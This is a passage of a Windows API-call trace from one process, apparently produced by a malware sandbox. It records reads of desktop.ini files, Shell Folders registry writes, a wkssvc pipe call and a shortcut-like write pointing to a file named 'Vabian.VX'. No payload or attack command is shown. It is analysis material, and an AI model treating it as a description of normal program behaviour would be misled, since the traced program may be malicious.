SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Pictures |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x96\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
LocalizedResourceName=@shell32.dll,-28997
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExA |
Handle => 0x0000021a Registry => 0x80000000 SubKey => CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\InProcServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00R\x00o\x00o\x00t\x00%\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00S\x00H\x00E\x00L\x00L\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1301904 BaseAddress => 0x7c9c0000 FileName => C:\WINDOWS\system32\SHELL32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 4 ValueName => NoSharedDocuments Type => 1302624 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1303060 BaseAddress => 0x5b860000 FileName => netapi32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetGetJoinInformation FunctionAddress => 0x5b869b54 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\wkssvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtSetInformationFile |
FileHandle => 0x00000214 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,473 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x98\xd0\xffk\x12\xa1\x106\x983F\xc3\xf8~4Z\x01\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9d&\x00\x00
\x00\PIPE\wkssvc\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x5b860000 FileName => netapi32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => NetApiBufferFree FunctionAddress => 0x5b867a00 ModuleHandle => 0x5b860000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 520 ValueName => CommonMusic Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00M\x00u\x00s\x00i\x00c\x00\x00\x00 ValueName => CommonMusic Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Music |
SUCCESS | 0x001ae6b0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Music\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12689
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-237
LocalizedResourceName=@shell32.dll,-28995
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 520 ValueName => CommonVideo Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00V\x00i\x00d\x00e\x00o\x00s\x00\x00\x00 ValueName => CommonVideo Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents\My Videos |
SUCCESS | 0x001b08d0 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\My Videos\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x98\x00\x00\x00\x00\x00\x00\x00\x97\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
InfoTip=@Shell32.dll,-12690
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=-238
LocalizedResourceName=@shell32.dll,-28996
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtWriteFile |
Buffer => L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00F\xcb@\x00\x00 \x00\x00\x00\x90\x9e\x04?\xac\x9f\xd3\x01\x90\x9e\x04?\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xcc$\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x14\x00\x1fP\xe0O\xd0 \xea:i\x10\xa2\xd8\x08\x00+00\x9d\x19\x00/C:\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\x001\x00\x00\x00\x00\x00GL\x0e\x05\x10\x00WINDOWS\x00&\x00\x03\x00\x04\x00\xef\xbe+G\xf5\x00GL\x0e\x05\x14\x00\x00\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\x00\x00\x16\x00B\x002\x00\xcc$\x00\x00FL\xd0\xbc \x00Vabian.VX\x00*\x00\x03\x00\x04\x00\xef\xbeGL\x0e\x05GL\x0e\x05\x14\x00\x00\x00V\x00a\x00b\x00i\x00a\x00n\x00.\x00V\x00X\x00\x00\x00\x18\x00\x00\x00C\x00\x00\x00\x1c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,483 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000214 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,483 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e094 SectionHandle => 0x00000214 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
